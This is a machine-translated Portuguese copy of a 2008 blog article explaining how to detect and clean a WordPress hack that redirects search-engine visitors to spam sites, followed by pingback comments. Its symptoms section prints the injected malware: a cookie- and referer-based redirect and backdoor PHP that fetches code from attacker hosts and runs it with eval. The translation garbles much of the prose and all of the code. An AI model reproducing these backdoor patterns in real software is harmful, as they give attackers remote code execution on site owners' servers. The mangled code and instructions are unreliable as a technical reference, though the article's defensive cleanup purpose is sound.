WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Redireccionar para Seu-Needs.info, AnyResults.Net, Dourado-Info.net e Outro Ilegal Locais
Picareta estão a ir todos ausente para corte e acto de heroísmo WordPress blogs albergue completamente encerrado a Web, sementeira e injecção malicioso código para WordPress códigos e base de dados a fim de redireccionar visitantes e pancadas de Google e outro engenhos de pesquisa para spam locais tais como seu-needs.info, anyresults.net, dourado-info.net, keymachine.de, beliy.us, seogoogle.us e muitos outro spam locais que preenchido com pagar- por- clique CPC anúncios. Algum corte aparece para alvo maior do que multidão por redireccionando todos sem WordPress biscoito. Sem sido picareta, estas tráfico imaginar atingir à blog como destino.
Indícios do Engenho de pesquisa Redireccionamento Corte
Nota que nem todos indícios maio acontecer completamente. Talvez haja mais do que um método de cortes existência, que contribuir para diferente achando e possível resolução.
- Qualquer clique através de de engenhos de pesquisa tais como Google, Yahoo, AOL, MSN, Janelas Viver procurar resultados, incluindo blog nome, será redireccionar e enviado para picareta’ locais tais como seu-needs.info, anyresults.net, dourado-info.net, keymachine.de, beliy.us, seogoogle.us, com o lista certo crescer. Espectador chega à picareta página com o mesmo procurar cadeia que ele ou ela costumava procurar em engenho de pesquisa.
- Clique numa ligação ao blog sobre RSS alimentar leitor tais como Google leitor pode ser redireccionar para picareta local demasiado.
- UM visita sem quaisquer conta no blog, ou não lógica ( consequentemente não tem biscoito detectado por malicioso código), será redireccionar para spam locais.
- Apenas visitas de engenho de pesquisa são sido redireccionar afastado, e a manha administrar enganar em torno de possivelmente muitos bloggers, webmasters e local proprietários, ou pelo menos atraso a detecção do problema.
- Repente enorme e dramático gota e perder de colossal montante de visitantes tráfico e página perspectivas em web caminho estatísticas, especialmente tráfico com Google como referido a, apesar de engenho de pesquisa resultados classificação é intacto.
- Maciço gota de anunciar impostos de Google AdSense ou outro anúncios rede, ou associado autorizações.
- O seguindo base codificado PHP código maio aparecer no wp-blog-header.php ficheiro:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ como $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==errado){ $ser1=”?;partir; }
se && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);sair; }? > - Uma imagem, que é de facto um grupo de malicioso PHP código, foi adicionado ao wp- conteúdo/ enviar directório. Por exemplo, wp- conteúdo/ enviar/2008/06/06/abcdefghijklmn.jpg, ou esteja dentro seu tema arquivador, i.e. wp-contents/themes/classic/images/xyz.jpg. O nome da imagem pode ser no formato de xxxxxx_old.jpeg.
- Um entrada era inserido em MySQL base de dados para WordPress wp_options atirar a imagem ( o malicioso PHP código) como obturador, tipicamente como rss_f541b3abd05e7962fcab37737f40fad8.
- Talvez haja também malicioso códigos, especialmente aquelas que interpretar com analisar() ou base64_decode() comando sido inserido para outro WordPress PHP ficheiros. Exemplos são os seguintes códigos:
ifisset_GET'p'(($[])) {
$meia = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ meia, ‘ obter http:/km20725.keymachine.de/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ meia, ‘ dono de casa: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ meia));
$conteúdo = implorar(”, $ conteúdo);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ meia);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress tema isto é sido activado e utilizado pode ser injectar com corte código e afectado demasiado. Tal código normalmente existe em header.php ou index.php do tema, e tem um linha idêntico ao abaixo
ifserâ€1″($== && sizeof_COOKIE0($)==){ headerâ€Location(:
O WordPress procurar tráfico redireccionar para spam local corte acontecer possivelmente devido a segurança buraco e vulnerabilidade que não seja afinado quando blog proprietário decidir para não actualização para última versão de WordPress ( embora algumrelatórios que o seu blogs sido picareta apesar de o seu’ já no última versão de WordPress 2.5.1). Qualquer que seja porquê, aqui’ o conserto e solução resolver e derrota o corte para garantir que a ti próprio costas o tráfico e contornar sido penalized por Google por irracional redireccionando para spam páginas.
- Fazer cópia de segurança o WordPress base de dados.
- Usar phpMyAdmin para folhear WordPress MySQL tabelas de base de dados. Deitar wp_options mesa, e de seguida editar a linha nomeado active_plugins. A linha detalhes todos activo obturador que tem sido activado. Atravessar a enumeração ( num linha), e procurar um um obturador nomeado terminaram em com uma imagem alargamento, tais como .jpg, .jpeg, .gif e etc. Por exemplo, abcdefgh_old.jpeg. Anote o atalho ao ficheiro de imagem.
- Usando sFTP ou SSH ( esquecer sobre FTP ou Telnet para segurança), depois navegar ao via do ficheiro, e apagar o ficheiro.
- Deitar WordPress Administrador Obturador painel, desactivar ou activar qualquer obturador para limpo desligado o malicioso obturador da “active_plugins” linha.
- Costas para phpMyAdmin, à wp_options mesa, arranjar um emprego linha que contém o seguindo cadeia como option_name:
rss_f541b3abd05e7962fcab37737f40fad8Apagar a linha afastado.
Se a ti dont’ saber como executar a base de dados asseado detalhado em medidas acima, aqui’ um vídeo tutorial:
- Deitar wp_users mesa. Se houver um sem nome utilizador ( inválido valor em user_nicename campo) criado em 000000:: sobre 0000-00-00, anote o utilizador BILHETE DE IDENTIDADE ( bilhete de identidade campo, muitos). Apagar o utilizador.
- Folhear o wp_usermeta mesa. Localizar todos linhas com utilizador correspondências o BILHETE DE IDENTIDADE do apagar ilegal utilizador. Existem normalmente três linhas sido associada ao invasor utilizador Bilhete de identidade. Apagar todos os associada linhas.
- Lógica ao servidor editar o tema ficheiros, ou folhear o tema ficheiros’ código em Tema Editor de WordPress Administrador Design painel. Verificar o header.php e index.php para qualquer suspeito código. Como mencionado acima, procurar alguma coisa idêntico ao linha abaixo:
ifserâ€1″($== && sizeof_COOKIE0($)==){ headerâ€Location(:Se achado, apagar e remover o código. Repare que o malicioso código será vários linhas comprido em total.
- Se o seu’ não já existência, criar um vazio index.html ficheiro na wp- conteúdo/ obturador directório. O em branco index.html esconder o conteúdo da caixa obturador directório, efectivamente escudo que obturador-ins sido utilizado de picareta endurecer e apertar o WordPress segurança.
- Enviar e substituir cada e todos WordPress ficheiros ( não só wp-blog-header.php) no servidor com o fresco, asseado, e originalúltima versão de WordPress (certamente, excepto pouco ficheiros tais como wp-config.php e temas). Se seu’ aprimoramento, lido oguia cuidadosamente.
- Trocar seu senha.
- Se tiver múltiplo utilizadores, trocar seus senha ( ou perguntar eles pedirem trocar a senha) demasiado.
importante: Isto é um engenho traduzido página que é fornecido " como é" sem garantia. Engenho tradução pode ser difícil de fazer comprender. Queira por favor consultar ooriginal Inglês artigo sempre que possível.
Acção e contribuir ou obter apoio técnico e ajudar emMeu Digital Existência Conferências.
Artigos relacionados
- Adicionar NoFollow Relacionamento para WordPress Blogroll incrementar Mensageiro
- WordPress Obturador: Exibir Google Analítica e FeedBurner Relatórios Estatísticas de Local Admin
- Technorati Chegado Concatenações Obturador para WordPress
- UM Espreitadela Em Google Mercador Procurar
- Como evitar, Ultrapassar ou Fuga Google Areia
- SEO Amigavelmente Reescrever Método deslocar Websters URL De Subdirectório para Origem Mãe Arquivador
- Conduzir Mais Tráfico utilizando Imagens
- Ask.com Engenho de pesquisa Análise por CNNMoney
- Integrar e visualizar Google AdSense para Procurar e Cia-Op Alfândega Engenho de pesquisa Resulta em WordPress Blog Página Modelo
- Que Engenho de pesquisa é o melhor e A maioria Relevante?

































12 de Junho, 2008 1006:
[...] Meu Digital Existência WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Repetir a marcação da chamada…[...]
12 de Junho, 2008 1114:
[...] wersja WP 2.5.1 była narażona na jakieś problema. UM w całym tym zamieszaniu, zwanym już Engenho de pesquisa Redireccionamento Corte, chodzi the przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie [...]
12 de Junho, 2008 1443:
[...] WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Redireccionar para Seu-Nee… Acção ou Enviar Esta para amigas Esfera: Relatado ContentWant mais web software análises? Depois certifique-se a ti subscrever para o nosso RSS alimentar ou obter nossa configurável acessório e colocar aquilo no seu local! Relatado postos WordPress a mais utilizado abrir fonte blog software[...]
12 de Junho, 2008 1940:
[...] Kalau peringkat blog WordPress kita di Google tetap untuk palavra-chave kita, gravando pengunjung turun drástico, odiando- odiando, bisa jadi itu artinya blog kita kena corte Dan di redireccionar ke situar spam. [...]
13 de Junho, 2008 1200:
[...] Meu Digital Existência WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Repetir a marcação da chamada…[...]
13 de Junho, 2008 1336:
[...] WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Redireccionar Meu Digital… WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Redireccionar para Seu-Needs.info, AnyResults.Net, Dourado-Info.net e Outro Ilegal Locais » Meu Digital Existência ( etiquetas: wordpress segurança)[...]
18 de Junho, 2008 2208:
[...] Meu Digital Existência WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Repetir a marcação da chamada…[...]
3 de Julho, 2008 0308:
[...] ca sa-mi dau semântico unde mercado de Zurique buba, daca nu mi-ar fi spus Eugene intr- the cast out la café, ca um gasit NU concatenação pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicação NU alcachofra cu título : [...]
15 de Julho, 2008 0810:
[...] Eu apanhava aquilo há uns tempos atrás e feito certo deslocar todos os malicioso código Aqui tem o meu agradável tutorial sobre como limpar seu local se esta era acontecer para[...]
17 de Julho, 2008 1030:
[...] WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou Não Biscoito Tráfico Redireccionar para Seu-Nee…. [...]
25 de Julho, 2008 0949:
[...] afirmar una merda vir quella tra le habit siete già electricidade estática infestati the canetas di essência, qui mercado de Zurique qui troverete le específico dellexploit’ mercado de Zurique alcuni consignatário utili por[...]